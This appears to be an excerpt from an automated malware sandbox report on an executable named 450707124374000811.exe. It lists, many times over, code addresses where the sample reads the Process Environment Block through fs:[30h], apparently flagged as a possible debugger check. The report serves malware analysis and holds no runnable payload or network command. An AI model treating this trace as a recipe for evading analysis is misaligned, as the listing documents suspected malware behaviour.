    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35945096 mov eax, dword ptr fs:[00000030h]4_2_35945096
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596D090 mov eax, dword ptr fs:[00000030h]4_2_3596D090
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596D090 mov eax, dword ptr fs:[00000030h]4_2_3596D090
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597909C mov eax, dword ptr fs:[00000030h]4_2_3597909C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CD080 mov eax, dword ptr fs:[00000030h]4_2_359CD080
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CD080 mov eax, dword ptr fs:[00000030h]4_2_359CD080
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593D08D mov eax, dword ptr fs:[00000030h]4_2_3593D08D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359690DB mov eax, dword ptr fs:[00000030h]4_2_359690DB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov ecx, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov ecx, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov ecx, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov ecx, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD0C0 mov eax, dword ptr fs:[00000030h]4_2_359BD0C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD0C0 mov eax, dword ptr fs:[00000030h]4_2_359BD0C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359650E4 mov eax, dword ptr fs:[00000030h]4_2_359650E4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359650E4 mov ecx, dword ptr fs:[00000030h]4_2_359650E4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A150D9 mov eax, dword ptr fs:[00000030h]4_2_35A150D9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0903E mov eax, dword ptr fs:[00000030h]4_2_35A0903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0903E mov eax, dword ptr fs:[00000030h]4_2_35A0903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0903E mov eax, dword ptr fs:[00000030h]4_2_35A0903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0903E mov eax, dword ptr fs:[00000030h]4_2_35A0903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E705E mov ebx, dword ptr fs:[00000030h]4_2_359E705E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E705E mov eax, dword ptr fs:[00000030h]4_2_359E705E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15060 mov eax, dword ptr fs:[00000030h]4_2_35A15060
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B052 mov eax, dword ptr fs:[00000030h]4_2_3596B052
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov ecx, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD070 mov ecx, dword ptr fs:[00000030h]4_2_359BD070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C106E mov eax, dword ptr fs:[00000030h]4_2_359C106E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599739A mov eax, dword ptr fs:[00000030h]4_2_3599739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599739A mov eax, dword ptr fs:[00000030h]4_2_3599739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E13B9 mov eax, dword ptr fs:[00000030h]4_2_359E13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E13B9 mov eax, dword ptr fs:[00000030h]4_2_359E13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E13B9 mov eax, dword ptr fs:[00000030h]4_2_359E13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359633A5 mov eax, dword ptr fs:[00000030h]4_2_359633A5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359733A0 mov eax, dword ptr fs:[00000030h]4_2_359733A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359733A0 mov eax, dword ptr fs:[00000030h]4_2_359733A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A1539D mov eax, dword ptr fs:[00000030h]4_2_35A1539D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB3D0 mov ecx, dword ptr fs:[00000030h]4_2_359FB3D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A153FC mov eax, dword ptr fs:[00000030h]4_2_35A153FC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF3E6 mov eax, dword ptr fs:[00000030h]4_2_359FF3E6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0132D mov eax, dword ptr fs:[00000030h]4_2_35A0132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0132D mov eax, dword ptr fs:[00000030h]4_2_35A0132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C930B mov eax, dword ptr fs:[00000030h]4_2_359C930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C930B mov eax, dword ptr fs:[00000030h]4_2_359C930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C930B mov eax, dword ptr fs:[00000030h]4_2_359C930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35937330 mov eax, dword ptr fs:[00000030h]4_2_35937330
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F32A mov eax, dword ptr fs:[00000030h]4_2_3596F32A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939353 mov eax, dword ptr fs:[00000030h]4_2_35939353
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939353 mov eax, dword ptr fs:[00000030h]4_2_35939353
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593D34C mov eax, dword ptr fs:[00000030h]4_2_3593D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593D34C mov eax, dword ptr fs:[00000030h]4_2_3593D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15341 mov eax, dword ptr fs:[00000030h]4_2_35A15341
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35947370 mov eax, dword ptr fs:[00000030h]4_2_35947370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35947370 mov eax, dword ptr fs:[00000030h]4_2_35947370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35947370 mov eax, dword ptr fs:[00000030h]4_2_35947370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E3370 mov eax, dword ptr fs:[00000030h]4_2_359E3370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF367 mov eax, dword ptr fs:[00000030h]4_2_359FF367
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A092A6 mov eax, dword ptr fs:[00000030h]4_2_35A092A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A092A6 mov eax, dword ptr fs:[00000030h]4_2_35A092A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A092A6 mov eax, dword ptr fs:[00000030h]4_2_35A092A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A092A6 mov eax, dword ptr fs:[00000030h]4_2_35A092A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597329E mov eax, dword ptr fs:[00000030h]4_2_3597329E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597329E mov eax, dword ptr fs:[00000030h]4_2_3597329E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C92BC mov eax, dword ptr fs:[00000030h]4_2_359C92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C92BC mov eax, dword ptr fs:[00000030h]4_2_359C92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C92BC mov ecx, dword ptr fs:[00000030h]4_2_359C92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C92BC mov ecx, dword ptr fs:[00000030h]4_2_359C92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15283 mov eax, dword ptr fs:[00000030h]4_2_35A15283
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359552A0 mov eax, dword ptr fs:[00000030h]4_2_359552A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359552A0 mov eax, dword ptr fs:[00000030h]4_2_359552A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359552A0 mov eax, dword ptr fs:[00000030h]4_2_359552A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359552A0 mov eax, dword ptr fs:[00000030h]4_2_359552A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D72A0 mov eax, dword ptr fs:[00000030h]4_2_359D72A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D72A0 mov eax, dword ptr fs:[00000030h]4_2_359D72A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B2D3 mov eax, dword ptr fs:[00000030h]4_2_3593B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B2D3 mov eax, dword ptr fs:[00000030h]4_2_3593B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B2D3 mov eax, dword ptr fs:[00000030h]4_2_3593B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A152E2 mov eax, dword ptr fs:[00000030h]4_2_35A152E2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F2D0 mov eax, dword ptr fs:[00000030h]4_2_3596F2D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F2D0 mov eax, dword ptr fs:[00000030h]4_2_3596F2D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359492C5 mov eax, dword ptr fs:[00000030h]4_2_359492C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359492C5 mov eax, dword ptr fs:[00000030h]4_2_359492C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF2F8 mov eax, dword ptr fs:[00000030h]4_2_359FF2F8
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359392FF mov eax, dword ptr fs:[00000030h]4_2_359392FF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EB2F0 mov eax, dword ptr fs:[00000030h]4_2_359EB2F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EB2F0 mov eax, dword ptr fs:[00000030h]4_2_359EB2F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15227 mov eax, dword ptr fs:[00000030h]4_2_35A15227
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35977208 mov eax, dword ptr fs:[00000030h]4_2_35977208
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35977208 mov eax, dword ptr fs:[00000030h]4_2_35977208
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB256 mov eax, dword ptr fs:[00000030h]4_2_359FB256
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB256 mov eax, dword ptr fs:[00000030h]4_2_359FB256
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0D26B mov eax, dword ptr fs:[00000030h]4_2_35A0D26B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0D26B mov eax, dword ptr fs:[00000030h]4_2_35A0D26B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CD250 mov ecx, dword ptr fs:[00000030h]4_2_359CD250
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939240 mov eax, dword ptr fs:[00000030h]4_2_35939240
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939240 mov eax, dword ptr fs:[00000030h]4_2_35939240
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_3597724D mov eax, dword ptr fs:[00000030h] | 4_2_3597724D
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35969274 mov eax, dword ptr fs:[00000030h] | 4_2_35969274
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35981270 mov eax, dword ptr fs:[00000030h] | 4_2_35981270
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35981270 mov eax, dword ptr fs:[00000030h] | 4_2_35981270
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35939D96 mov eax, dword ptr fs:[00000030h] | 4_2_35939D96
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35939D96 mov eax, dword ptr fs:[00000030h] | 4_2_35939D96
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35939D96 mov ecx, dword ptr fs:[00000030h] | 4_2_35939D96
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_3593FD80 mov eax, dword ptr fs:[00000030h] | 4_2_3593FD80
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_3595DDB1 mov eax, dword ptr fs:[00000030h] | 4_2_3595DDB1
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_3595DDB1 mov eax, dword ptr fs:[00000030h] | 4_2_3595DDB1
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_3595DDB1 mov eax, dword ptr fs:[00000030h] | 4_2_3595DDB1
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359CDDB1 mov eax, dword ptr fs:[00000030h] | 4_2_359CDDB1
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35979DAF mov eax, dword ptr fs:[00000030h] | 4_2_35979DAF
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_3594FDA9 mov eax, dword ptr fs:[00000030h] | 4_2_3594FDA9
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359D5DA0 mov eax, dword ptr fs:[00000030h] | 4_2_359D5DA0
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359D5DA0 mov eax, dword ptr fs:[00000030h] | 4_2_359D5DA0
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359D5DA0 mov eax, dword ptr fs:[00000030h] | 4_2_359D5DA0
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359D5DA0 mov ecx, dword ptr fs:[00000030h] | 4_2_359D5DA0
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35943DD0 mov eax, dword ptr fs:[00000030h] | 4_2_35943DD0
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35943DD0 mov eax, dword ptr fs:[00000030h] | 4_2_35943DD0
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FDDC7 mov eax, dword ptr fs:[00000030h] | 4_2_359FDDC7
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359CDDC0 mov eax, dword ptr fs:[00000030h] | 4_2_359CDDC0
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35A0DDC6 mov eax, dword ptr fs:[00000030h] | 4_2_35A0DDC6
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D00 mov eax, dword ptr fs:[00000030h] | 4_2_35953D00
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D20 mov eax, dword ptr fs:[00000030h] | 4_2_35953D20
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359CFD2A mov eax, dword ptr fs:[00000030h] | 4_2_359CFD2A
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359CFD2A mov eax, dword ptr fs:[00000030h] | 4_2_359CFD2A
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35937D41 mov eax, dword ptr fs:[00000030h] | 4_2_35937D41
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h] | 4_2_35953D40
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_3597BD4E mov eax, dword ptr fs:[00000030h] | 4_2_3597BD4E
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_3597BD4E mov eax, dword ptr fs:[00000030h] | 4_2_3597BD4E
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359CDD47 mov eax, dword ptr fs:[00000030h] | 4_2_359CDD47
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35947D75 mov eax, dword ptr fs:[00000030h] | 4_2_35947D75
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35947D75 mov eax, dword ptr fs:[00000030h] | 4_2_35947D75
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359EFD78 mov eax, dword ptr fs:[00000030h] | 4_2_359EFD78
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359EFD78 mov eax, dword ptr fs:[00000030h] | 4_2_359EFD78
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359EFD78 mov eax, dword ptr fs:[00000030h] | 4_2_359EFD78
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359EFD78 mov eax, dword ptr fs:[00000030h] | 4_2_359EFD78
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359EFD78 mov eax, dword ptr fs:[00000030h] | 4_2_359EFD78
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359F9D70 mov eax, dword ptr fs:[00000030h] | 4_2_359F9D70
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359F9D70 mov eax, dword ptr fs:[00000030h] | 4_2_359F9D70
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35A15D50 mov eax, dword ptr fs:[00000030h] | 4_2_35A15D50
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35A15D50 mov eax, dword ptr fs:[00000030h] | 4_2_35A15D50
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35A01D5A mov eax, dword ptr fs:[00000030h] | 4_2_35A01D5A
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35A01D5A mov eax, dword ptr fs:[00000030h] | 4_2_35A01D5A
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35A01D5A mov eax, dword ptr fs:[00000030h] | 4_2_35A01D5A
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35A01D5A mov eax, dword ptr fs:[00000030h] | 4_2_35A01D5A
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35943C84 mov eax, dword ptr fs:[00000030h] | 4_2_35943C84
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35943C84 mov eax, dword ptr fs:[00000030h] | 4_2_35943C84
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35943C84 mov eax, dword ptr fs:[00000030h] | 4_2_35943C84
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_35943C84 mov eax, dword ptr fs:[00000030h] | 4_2_35943C84
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_3593DCA0 mov eax, dword ptr fs:[00000030h] | 4_2_3593DCA0
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
